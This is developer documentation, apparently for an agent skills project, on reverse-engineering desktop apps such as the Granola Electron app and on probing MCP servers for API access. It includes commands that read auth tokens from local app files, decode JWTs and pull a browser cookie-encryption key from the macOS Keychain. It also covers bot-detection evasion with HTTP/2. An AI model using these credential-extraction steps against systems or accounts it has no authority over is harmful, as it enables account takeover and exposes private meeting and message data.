# Or known paths
ls /Applications/Granola.app/Contents/Resources/app.asar
2. Extract strings from the bundle
# If app.asar exists, unpack or search it
npx asar extract /Applications/Granola.app/Contents/Resources/app.asar /tmp/granola-app
# Or just run strings on the binary
strings /Applications/Granola.app/Contents/MacOS/Granola | grep -E "https://|api\.|/v1/|/v2/"
3. Search for endpoint patterns
| Pattern | What you’ll find |
|---|---|
https://api. | Base API URLs |
https://notes. | Web app / docs URLs (often same backend, different frontend) |
/v1/, /v2/ | Versioned API paths |
get-documents, get-entity-set | Endpoint names — these are your operations |
4. Infer request shape from usage
Once you have endpoint names, search the bundle for where they’re called:
grep -r "get-entity-set\|get-entity-batch" /tmp/granola-app/
The surrounding code often shows the request body shape: { entity_type: "chat_thread" }.
Discovery: Local Cache → Data Model
The app syncs entities from the backend into a local cache. That cache is your schema discovery.
Find the cache file
Look for large JSON files or SQLite DBs in Application Support:
ls -la ~/Library/Application\ Support/Granola/
# cache-v6.json <- 800KB, entities inside
# local-state.json <- feature flags, config
Parse the structure
import json
from pathlib import Path
cache_path = Path.home() / "Library/Application Support/Granola/cache-v6.json"
data = json.loads(cache_path.read_text())
state = data.get("cache", {}).get("state", {})
entities = state.get("entities", {})
# What entity types exist?
print(entities.keys()) # ['chat_thread', 'chat_message']
Infer relationships
From the cache structure:
| Observation | Implication |
|---|---|
chat_thread.data.grouping_key == "meeting:{doc_id}" | Thread is linked to document |
chat_message.data.thread_id == thread.id | Message belongs to thread |
entity.type == "chat_thread" | API has entity_type parameter |
The cache gives you:
- Entity types — what to ask the API for
- Relationships — how to filter and join
- Field names — request/response shape
API Probing: Confirm and Call
You have a token and a list of endpoints. Now validate.
1. Reuse existing transport
If the API is behind a plain origin (no CloudFront WAF), urllib often works:
from urllib.request import Request, urlopen
import json, gzip
def api_post(token: str, endpoint: str, body: dict):
req = Request(
f"https://api.granola.ai{endpoint}",
data=json.dumps(body).encode(),
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
"Accept-Encoding": "gzip",
},
method="POST",
)
with urlopen(req, timeout=30) as r:
raw = r.read()
if r.headers.get("Content-Encoding") == "gzip":
raw = gzip.decompress(raw)
return json.loads(raw)
If you get 403, try httpx with HTTP/2 (see 1-transport).
2. Probe each endpoint
Start with the simplest call:
# List entities — what does the API return?
resp = api_post(token, "/v1/get-entity-set", {"entity_type": "chat_thread"})
# -> {"data": [{"id": "...", "workspace_id": "...", "created_at": "..."}], "entity_type": "chat_thread"}
3. Batch fetch for full data
The “set” endpoint usually returns IDs + minimal metadata. The “batch” endpoint returns full entities:
resp = api_post(token, "/v1/get-entity-batch", {
"entity_type": "chat_thread",
"entity_ids": ["uuid-1", "uuid-2"],
})
# -> {"data": [{"id": "...", "data": {"grouping_key": "meeting:doc-id", ...}}, ...]}
The data field on each entity is where the app-specific payload lives.
End-to-End Flow: Granola Example
- Auth —
~/Library/Application Support/Granola/supabase.json→workos_tokens.access_token - Documents —
POST /v2/get-documents(existing),POST /v1/get-documents-batch - Transcript —
POST /v1/get-document-transcript - Panels —
POST /v1/get-document-panels(AI summaries) - Chat threads —
POST /v1/get-entity-set+get-entity-batchwithentity_type: "chat_thread" - Chat messages — same with
entity_type: "chat_message" - Link —
chat_thread.data.grouping_key == "meeting:{document_id}"ties a thread to a meeting
Web URLs (from meeting summaries): https://notes.granola.ai/t/{thread_id} — same IDs as API.
API + Cache: Two Connections for Desktop Apps
Desktop apps that sync with a backend often have two data sources:
| Source | Where | When to use |
|---|---|---|
| API | Network call with token | Fresh data, full transcripts, works when online |
| Cache | Local file (JSON, SQLite) the app writes | Instant, offline, token expired, or fallback |
The app syncs entities into a local cache; that cache is often readable without the token. You can offer both as connections and let the caller choose.
Connection model
connections:
api:
description: "Live API — token from app, freshest data"
cache:
description: "Local cache — instant, works offline (reads app's cache file)"
Operations declare connection: api or connection: cache. Some operations may
support both; others (e.g. get_meeting with full transcript) may be API-only if
the cache doesn’t store transcripts.
When cache is enough
| Operation | API | Cache |
|---|---|---|
| list_meetings | Yes — paginated from server | Yes — state.documents (may be stale) |
| list_conversations | Yes | Yes — entities.chat_thread filtered by grouping_key |
| get_conversation | Yes | Yes — entities.chat_message by thread_id |
| get_meeting | Yes — full transcript + panels | Partial — cache may have docs but not transcript text |
Implementation pattern
CACHE_PATH = Path.home() / "Library" / "Application Support" / "Granola" / "cache-v6.json"
def load_cache() -> dict:
with open(CACHE_PATH) as f:
return json.load(f)
def cmd_list_conversations_from_cache(document_id: str) -> list:
data = load_cache()
threads = (data.get("cache", {}).get("state", {}).get("entities", {}) or {}).get("chat_thread", {})
target_key = f"meeting:{document_id}"
out = []
for tid, t in threads.items():
if (t.get("data") or {}).get("grouping_key") != target_key:
continue
out.append({...})
return out
Source param: api | cache | auto
For operations that support both, add a source param:
api— live call only (default)cache— local file onlyauto— try API, fall back to cache on 401/network error
This gives offline resilience without requiring the user to pick a connection up front.
Pure-cache skills (WhatsApp, Copilot Money)
Some desktop apps have no documented API — the app syncs internally and we only read the local DB. Those are “cache-only” by necessity:
| Skill | Data source | Pattern |
|---|---|---|
| ChatStorage.sqlite | Cache-only | |
| Copilot Money | CopilotDB.sqlite | Cache-only |
| Granola | api.granola.ai + cache-v6.json | API + cache |
Subagent Strategy for Exploration
When the codebase is large or you need to search broadly:
- Launch an explore subagent with the app path, cache path, and bundle path.
- Tasks: Extract API URLs from app.asar, parse cache JSON structure, identify entity types and relationships.
- Deliverable: Findings report with endpoints, auth location, data model.
Then implement the skill using those findings. The subagent does the tedious search-and-document step; you do the clean integration.
Checklist: New Desktop App Skill
| Step | Action |
|---|---|
| 1 | Find the app: mdfind or ls /Applications/ |
| 2 | Check for Electron: app.asar in Resources |
| 3 | Locate Application Support: ~/Library/Application Support/<AppName>/ |
| 4 | Find auth: grep for token, access_token, Bearer in JSON files |
| 5 | Find cache: large JSON or SQLite with entities, state, cache |
| 6 | Parse cache: entity types, relationships, field names |
| 7 | Extract endpoints: strings on binary or unpack asar, grep for https://, /v1/ |
| 8 | Probe API: get-entity-set, get-entity-batch or equivalent with token |
| 9 | Implement: same patterns as web skills — operations, adapters, error handling |
Real-World Examples
| Skill | Discovery path | API + cache |
|---|---|---|
skills/granola/ | supabase.json token, cache-v6.json entities, app.asar → get-entity-set/batch, grouping_key for meeting→thread link | Yes — api/cache/auto via source param |
skills/whatsapp/ | ChatStorage.sqlite | Cache-only (no API) |
skills/copilot-money/ | CopilotDB.sqlite | Cache-only (no API) |
Electron App Deep Dive
Electron apps are Chromium + Node.js packaged into a desktop shell. The JS bundle is readable, the storage is standard Chromium formats, and the auth tokens are often sitting in a JSON file. Once you know where to look, Electron is one of the easiest desktop targets.
Part of Layer 6: Desktop Apps. See also 3-auth for general auth patterns.
Identify Electron
ls /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar ← bundled JS/HTML/CSS
# app/ ← unpacked (less common)
file /Applications/SomeApp.app/Contents/MacOS/SomeApp
# Should reference Electron framework
Extract and Read the Bundle
# One-shot: extract app.asar to /tmp/app
npx @electron/asar extract /Applications/SomeApp.app/Contents/Resources/app.asar /tmp/app
ls /tmp/app
# Typical: dist-electron/ dist-app/ node_modules/ package.json
The bundle is minified but readable. Variable names are mangled; string literals (URLs, endpoint paths, header names) are not minified. Use these to navigate.
Find all API endpoints
grep -o "[a-zA-Z]*\.example\.com[^\"']*" /tmp/app/dist-electron/main/index.js | sort -u
Find all subdomains
grep -o "[a-z-]*\.example\.com" /tmp/app/dist-electron/main/index.js | sort -u
Find auth header construction
# Look for Authorization, X-Client-*, bearer
grep -o ".{0,150}Authorization.{0,150}" /tmp/app/dist-electron/main/index.js | head -10
Storage Locations
All Electron app data lives in:
~/Library/Application Support/<AppName>/
| File / Dir | What it contains |
|---|---|
*.json files | Auth tokens, config, feature flags |
Cookies | SQLite — Chromium encrypted cookies (usually empty in Electron) |
Local Storage/leveldb/ | LevelDB — localStorage, sometimes tokens |
IndexedDB/file__0.indexeddb.leveldb/ | IndexedDB — app state, can contain tokens |
Preferences | JSON — per-profile settings |
Electron apps typically store auth in JSON files, not browser cookies, because the main process (Node.js) writes them directly without going through Chromium’s cookie jar.
Find the Token
1. Scan JSON files for tokens
for f in ~/Library/Application\ Support/AppName/*.json; do
echo "=== $f ===" && python3 -c "
import json, sys
with open('$f') as f: d = json.load(f)
def walk(obj, p=''):
if isinstance(obj, dict):
for k,v in obj.items(): walk(v, p+'.'+k)
elif isinstance(obj, str) and len(obj) > 20:
print(f' {p}: {obj[:60]}')
walk(d)
"
done
2. Look for JWT patterns
# JWTs start with eyJ (base64url of {"alg":...)
grep -r "eyJ" ~/Library/Application\ Support/AppName/ --include="*.json" -l
3. Decode any JWT you find
import base64, json
def decode_jwt(token):
parts = token.split('.')
def b64d(s):
s += '=' * (4 - len(s) % 4)
return json.loads(base64.urlsafe_b64decode(s))
return b64d(parts[0]), b64d(parts[1]) # header, payload
header, payload = decode_jwt(token)
print("iss:", payload.get("iss")) # who issued it
print("exp:", payload.get("exp")) # expiry
print("claims:", list(payload.keys()))
The iss field tells you the auth provider (WorkOS, Supabase, Auth0, Okta,
etc.) and which client ID / tenant.
Required Headers
Most Electron APIs reject requests missing client identification headers. Find them by searching the bundle for the header-building function:
# Common patterns: X-Client-*, X-App-*, platform, device-id
grep -o ".{0,100}X-Client.{0,200}" /tmp/app/dist-app/assets/operationBuilder.js | head -5
Typical Electron API headers:
| Header | Example | Notes |
|---|---|---|
X-Client-Version | 7.71.1 | App version from package.json |
X-Client-Platform / X-Granola-Platform | darwin | OS platform |
X-Workspace-Id | UUID | Multi-tenant identifier |
X-Device-Id | UUID | Persisted device fingerprint |
Without these, the server may return {"message":"Unsupported client"} even
with a valid token.
Get the version:
cat /tmp/app/package.json | python3 -c "import json,sys; d=json.load(sys.stdin); print(d['version'])"
Auth Migration Pattern (Supabase → WorkOS)
Many Electron apps launched with Supabase Auth and later migrated to WorkOS (or Clerk, Auth0, etc.) for enterprise SSO. The telltale sign:
~/Library/Application Support/AppName/supabase.json ← filename from v1
→ contents: { "workos_tokens": "...", "user_info": ... } ← migration artifact
The filename is kept for backward compatibility, but the contents changed.
The old Supabase user UUID is preserved as external_id in the new JWT so
database foreign keys don’t break.
How to detect a migration:
import json
with open("supabase.json") as f:
d = json.load(f)
if "workos_tokens" in d:
print("Migrated to WorkOS — parse workos_tokens as JSON for the JWT")
elif "access_token" in d:
print("Still on Supabase — access_token is the JWT directly")
elif "session" in d:
print("Supabase session object — check session.access_token")
See workos.md for the full WorkOS token model.
CrossAppAuth — Desktop ↔ Web Session Handoff
Some Electron apps share a session between the desktop client and the web app without requiring a separate login. The pattern:
- User logs in on the web app (browser)
- Desktop app detects the session (via deep link, polling, or IPC)
- Desktop calls an
auth-handoff-complete-style endpoint with the web session - Server mints a new desktop token (different expiry, different claims)
You’ll see this as sign_in_method: "CrossAppAuth" in the JWT payload, or
as an endpoint like /v1/auth-handoff-complete in the app bundle.
To find:
grep -o "[^\"]*auth.handoff[^\"]*\|[^\"]*cross.app[^\"]*" /tmp/app/dist-electron/main/index.js
Feature Flags
Electron apps frequently gate features behind server-controlled flags stored
in local-state.json or a similar config file:
import json
with open("local-state.json") as f:
d = json.load(f)
flags = d.get("featureFlags", {})
for k, v in flags.items():
print(f" {k}: {v}")
If an API endpoint returns 403 Forbidden or {"enabled": false} even with
a valid token, check whether there’s a feature flag that needs to be true.
Some flags are user-controlled (toggle in Settings), others are server-pushed
and require a plan upgrade.
Chromium Storage (usually empty)
Electron apps can use Chromium cookies and localStorage, but most don’t — the Node.js main process writes tokens directly to JSON files instead.
If you do find a populated Cookies database, decrypt it the same way as
Brave or Chrome:
# Check if there's a Keychain entry
security find-generic-password -s "AppName Safe Storage" -a "AppName" -w
# Cookies database
sqlite3 ~/Library/Application\ Support/AppName/Cookies \
"SELECT name, host_key FROM cookies LIMIT 20;"
See the skills/brave-browser/ skill for the full
Chromium cookie decryption pipeline (PBKDF2 + AES-128-CBC).
Checklist
□ Find app.asar and extract it
□ Grep for all subdomains and API endpoints
□ Find the header-building function → identify required custom headers
□ Scan ~/Library/Application Support/<App>/*.json for tokens
□ Decode any JWT → check iss, exp, claims
□ Detect auth migration (supabase.json but workos_tokens key?)
□ Test token against a known-working endpoint with correct headers
□ Check for feature flags gating the feature you need
Reverse Engineering — MCP Servers
How to discover, evaluate, and map Model Context Protocol (MCP) servers for skills that need to connect as MCP clients. Unlike web reverse-engineering, MCPs are self-describing — tools/list hands you the full tool catalog. What you’re reverse-engineering is auth, actual response shapes, coverage gaps, and behavioral quirks.
This is Layer 7 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery — 2-discovery
- Layer 3: Auth & Runtime — 3-auth
- Layer 4: Content — 4-content
- Layer 5: Social Networks — 5-social
- Layer 6: Desktop Apps — 6-desktop-apps
- Layer 7: MCP Servers (this file) — discovering and evaluating MCPs for skill integration
Tool: The MCP test harness in agentos/scripts/mcp-test.mjs is the primary probe. Use it to discover tools, test calls, and inspect responses. Smithery registry (mcp-test.mjs smithery search) finds third-party MCPs.
Transport — use httpx, not urllib
HTTP MCPs (Granola, Linear, etc.) often sit behind CloudFront or Cloudflare. Python urllib and requests advertise http/1.1 and get flagged by JA4 fingerprinting. Follow 1-transport: use httpx with http2=True for Python probes. Node fetch is fine (negotiates HTTP/2). Skill-local probe scripts (e.g. skills/granola/mcp-probe.py) should use httpx.
Layer 0: Existence — Does the service have an MCP?
Before anything else, determine if an MCP exists for the service. Three discovery paths:
Convention probing
Most services follow predictable URL patterns. Probe these for every skill you have:
| Pattern | Example |
|---|---|
https://mcp.{domain}/mcp | Granola: mcp.granola.ai/mcp, Linear: mcp.linear.app/mcp |
https://{domain}/mcp | https://example.com/mcp |
https://api.{domain}/mcp | https://api.example.com/mcp |
Probe: Send a bare POST with an initialize JSON-RPC request. A 404 or connection refused means nothing there. A JSON-RPC response or auth challenge means you found one.
# Using mcp-test.mjs with a raw URL (no auth)
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
Smithery registry
The Smithery registry indexes MCPs published by third parties. Use this for services that might have community MCPs but no official one:
node scripts/mcp-test.mjs smithery search "granola"
node scripts/mcp-test.mjs smithery search "linear"
Web search
Services are publicly announcing MCP support. Search for "{service name}" MCP or "{service name}" Model Context Protocol in changelogs, blog posts, or docs.
Output: Existence table
| Skill | MCP URL | Transport | Status |
|---|---|---|---|
| granola | mcp.granola.ai/mcp | HTTP | found |
| linear | mcp.linear.app/mcp | HTTP | found |
| todoist | npx @abhiz123/todoist-mcp-server | stdio | found (3rd party) |
| goodreads | — | — | none found |
Layer 1: Transport — How does the session work?
MCPs run over two transports. The harness handles both; you need to log what you observe.
Streamable HTTP
- POST JSON-RPC to the URL
- Response may be plain JSON or SSE (
event: message\ndata: {...}) mcp-session-idin response headers — session-stateful vs stateless- Used by: Granola, Linear, other hosted MCPs
Stdio
- Spawn subprocess:
npx -y @package/mcp-server - JSON-RPC over stdin/stdout, newline-delimited
- Used by: Todoist, Notion, Slack (npm packages)
What to log
| Field | How to check |
|---|---|
mcp-session-id | Response headers on first request |
| Response format | SSE vs plain JSON body |
protocolVersion | From initialize response result.serverInfo |
capabilities | Tools, resources, prompts, logging |
| Server-initiated requests | Any during handshake? |
Layer 2: Auth — What does it need and how do you get in?
MCP auth discovery is a waterfall. The protocol is designed for this.
Step 1: Naked probe
Send initialize with no auth headers.
| Outcome | Meaning |
|---|---|
| Success | Public MCP, no auth (rare for user data) |
401 with WWW-Authenticate | Auth required; header describes scheme |
Connection accepted, tools/call fails | Auth is per-call, not per-session |
Step 2: OAuth discovery
Two discovery paths. The 401 response may include resource_metadata pointing at one of these:
Protected resource discovery (RFC 9729):
GET {origin}/.well-known/oauth-protected-resource
Returns authorization_servers, resource, bearer_methods_supported. Example: Granola’s 401 pointed to this; response: {"authorization_servers":["https://mcp-auth.granola.ai"], ...}.
OAuth authorization server discovery (RFC 8414):
GET {origin}/.well-known/oauth-authorization-server
Returns authorization_endpoint, token_endpoint, scopes_supported for the full OAuth flow.
Step 3: Token reuse hypothesis
For services where you already have a skill: can you reuse the existing token? Granola’s supabase token, Linear’s API key — do they work as Authorization: Bearer {token} against the MCP endpoint? This is a single-line test.
Step 4: Scope mapping
Once authenticated: does the MCP give full access or a restricted view? Some MCPs expose read-only tools even if the underlying API supports writes.
Layer 3: Tool catalog — What’s exposed?
This is where MCPs are radically easier than web reverse-engineering. tools/list returns the full catalog:
{
"tools": [{
"name": "list_meetings",
"description": "List recent meetings",
"inputSchema": { "type": "object", "properties": { "limit": { "type": "integer" } } }
}]
}
Cross-reference with existing skill
For each MCP tool, find the corresponding operation in your existing skill. Build a coverage matrix:
| Your Operation | MCP Tool | Match? | Notes |
|---|---|---|---|
list_meetings | list_meetings | exact | Same params? |
get_meeting | get_document | name differs | Check if transcript included |
list_conversations | — | no match | MCP doesn’t expose Q&A |
| — | create_note | no match | MCP has write we don’t |
This matrix is the key deliverable — it tells you whether the MCP is superset, subset, or lateral complement.
Annotation analysis
Check tool.annotations:
readOnlyHint— safe to probe, no mutatingdestructiveHint— mutates state, be careful in testing
Layer 4: Response analysis — What does the data look like?
MCP input schemas are declared; output is usually opaque content: [{type: "text", text: "..."}]. You must call each tool and inspect.
For each read-safe tool
- Call with minimal params
- Unwrap
content[0].textand parse as JSON - Document the actual response shape — field names, nesting, types
- Compare field-by-field to your existing skill’s normalized output
This answers: Is the MCP richer, thinner, or different? Does Granola’s MCP return raw utterances like the internal API, or only a pre-formatted summary?
Layer 5: Gap analysis — Is it worth connecting?
For each service, combine layers 0–4 into a verdict:
| Signal | Implication |
|---|---|
| MCP covers all your operations with equal or richer data | MCP as primary, existing skill as fallback |
| MCP covers some, misses others | Multi-connection: MCP for what it covers, API for the rest |
| MCP is thinner than your skill | Keep existing skill; MCP not worth it |
| MCP exposes tools you don’t have (especially writes) | MCP as additive connection |
| Auth is significantly easier via MCP | MCP worth it for auth stability alone |
Running the analysis
For each service, work through layers 0–4 using mcp-test.mjs:
# Generic harness (agentos repo) — pass URL; MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp call list_meetings '{"limit": 3}'
# Skill-local exploration (agentos-community) — reads token from Granola app
python3 skills/granola/mcp-probe.py
python3 skills/granola/mcp-probe.py tools
Start with services where you already have skills (Granola, Linear). You have ground truth — your existing skill tells you exactly what data to expect. The output is a completed coverage matrix and a clear verdict.
Real-World Examples
| Skill | MCP URL | Transport | Auth | Coverage |
|---|---|---|---|---|
| granola | mcp.granola.ai/mcp | HTTP | Different auth — supabase token invalid. 401 returns WWW-Authenticate: Bearer error="invalid_token", resource_metadata="https://mcp.granola.ai/.well-known/oauth-protected-resource". MCP uses OAuth; internal API token does not work. Probe with httpx succeeds (no TLS block). | |
| linear | mcp.linear.app/mcp | HTTP | OAuth / API key | TBD — run analysis |
Fill this table as you run the analysis. See skills/granola/ for the existing Python skill’s operations and adapter schema.
Probe commands
Use the generic harness (no service-specific code) or skill-local scripts:
# Generic MCP harness (agentos repo) — pass URL; set MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
MCP_BEARER_TOKEN=$(python3 -c "
import json
from pathlib import Path
p = Path.home() / 'Library/Application Support/Granola/supabase.json'
t = json.loads(json.load(p.open())['workos_tokens'])
print(t['access_token'])
") node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
# Skill-local exploration (agentos-community)
python3 skills/granola/mcp-probe.py
Helper Files & Patterns
Helper files
Keep skill YAML readable. When executor logic starts looking like real code, extract it into a helper file in the skill folder and have the operation call that file.
Keep in readme.md (markdown only — narrative, setup, examples):
- when to use the skill, limitations, and agent-facing notes
- short examples and troubleshooting
Keep in skill.yaml:
id,name,connections,adapters,operations, executors, and all machine-readable wiring
Move into helper files:
- long AppleScript, Swift, Python, or shell logic
- anything with loops, branching, string escaping, or manual JSON construction
- anything large enough that syntax highlighting, direct local execution, or isolated debugging would help
Preferred patterns:
- use
Swifthelper files for Apple framework integrations like Contacts, EventKit, or other native macOS APIs - use
Pythonhelper files for parsing, normalization, and API glue — preferpython:executor overcommand:+binary: python3 - use
bashonly for thin wrappers or simple pipelines - keep
AppleScriptinline only when it is truly short; otherwise prefer a helper file
Leading examples
| Skill | Pattern | File |
|---|---|---|
gmail | _call dispatch: list stubs then hydrate | gmail.py |
goodreads | GraphQL discovery, Apollo cache extraction, multi-tier runtime config | public_graph.py |
claude | API replay with session cookies and stealth headers | claude-api.py |
austin-boulder-project | Bundle config extraction and tenant-namespace auth | abp.py |
exa | Dashboard auth flows, __secrets__ import, Playwright→HTTPX pattern | (in progress) |
reddit | Shell helper for comment posting | comments_post.sh |
apple-contacts | Swift helpers for native macOS APIs | accounts.swift, get_person.swift |
Advanced patterns
This book does not try to document every executor or every edge case. If you need something advanced, copy an existing skill:
linearfor GraphQL with connectionsyoutubefor command executiongmail+mimestreamfor provider-sourced OAuth and_calldispatchclaude+brave-browserfor consumer/provider cookie patternsgoodreadsfor multi-connection (graphql + web) and sandbox storagegranolafor multi-connection (API + cache) with Python connection dispatchexa(in progress) for dashboard auth flows,__secrets__secret import, and the Playwright→HTTPX discovery pattern- an existing cookie-provider skill for keychain, crypto, and multi-step extraction
For skills that reverse-engineer web services without public APIs, see the Reverse Engineering section.
Skill Catalog
All skills in this repo. Each skill folder contains skill.yaml (the manifest) and readme.md (agent-facing docs).
Web & Search
| Skill | Entities | What it does |
|---|---|---|
exa | webpage | Semantic web search and content extraction |
brave | webpage | Web search via Brave Search API |
firecrawl | webpage | Browser-rendered page scraping |
curl | webpage | Simple URL fetching (no API key needed) |
serpapi | — | Flight search via SerpAPI |
research-web | document | Multi-source web research |
Productivity
| Skill | Entities | What it does |
|---|---|---|
todoist | task, project, tag | Task management with priorities and projects |
linear | task, project | Engineering project management |
gmail | Gmail via OAuth (read, search, send) | |
apple-calendar | meeting, calendar | macOS Calendar events |
apple-contacts | person | macOS Contacts |
Social & Communication
| Skill | Entities | What it does |
|---|---|---|
imessage | message, conversation, person | iMessage history |
whatsapp | message, conversation, person | WhatsApp history |
reddit | post, forum | Posts and comments from Reddit |
hackernews | post | Stories, comments, and discussions |
facebook | post | Facebook community posts |
Media & Content
| Skill | Entities | What it does |
|---|---|---|
youtube | video, channel, post | Video metadata, transcripts, and comments |
moltbook | book | Book metadata and reading lists |
goodreads | book, review, shelf | Goodreads library, reviews, and social reading |
Developer Tools
| Skill | Entities | What it does |
|---|---|---|
github | — | GitHub repos, issues, PRs |
git | — | Local git operations |
cursor | document | Research reports from Cursor sub-agents |
posthog | — | Product analytics |
Finance & Commerce
| Skill | Entities | What it does |
|---|---|---|
amazon | product, order | Amazon orders and product data |
chase | — | Chase bank account data |
copilot-money | — | Financial tracking |
AI & APIs
| Skill | Entities | What it does |
|---|---|---|
claude | — | Claude.ai web API (cookie-based) |
anthropic-api | — | Anthropic API (key-based) |
openrouter | — | Multi-model routing |
ollama | — | Local LLM inference |
Browser & System
| Skill | Entities | What it does |
|---|---|---|
playwright | — | Browser control via CDP — discovery and reverse engineering tool |
brave-browser | webpage, history | Browser history and cookie provider |
firefox | — | Firefox cookie provider |
macos-control | — | macOS automation (windows, apps, screenshots) |
macos-security | — | Keychain audit, token extraction, Google OAuth app scanning |
kitty | — | Kitty terminal control |
raycast | — | Raycast extension control |
Other
| Skill | Entities | What it does |
|---|---|---|
mimestream | — | OAuth token provider (Google) |
here-now | — | Location-aware context |
granola | — | Meeting notes and transcripts |
porkbun | — | Domain management |
gandi | — | Domain management |
logo-dev | — | Logo/brand image lookup |
austin-boulder-project | — | Climbing gym schedules |
icloud | — | iCloud data access |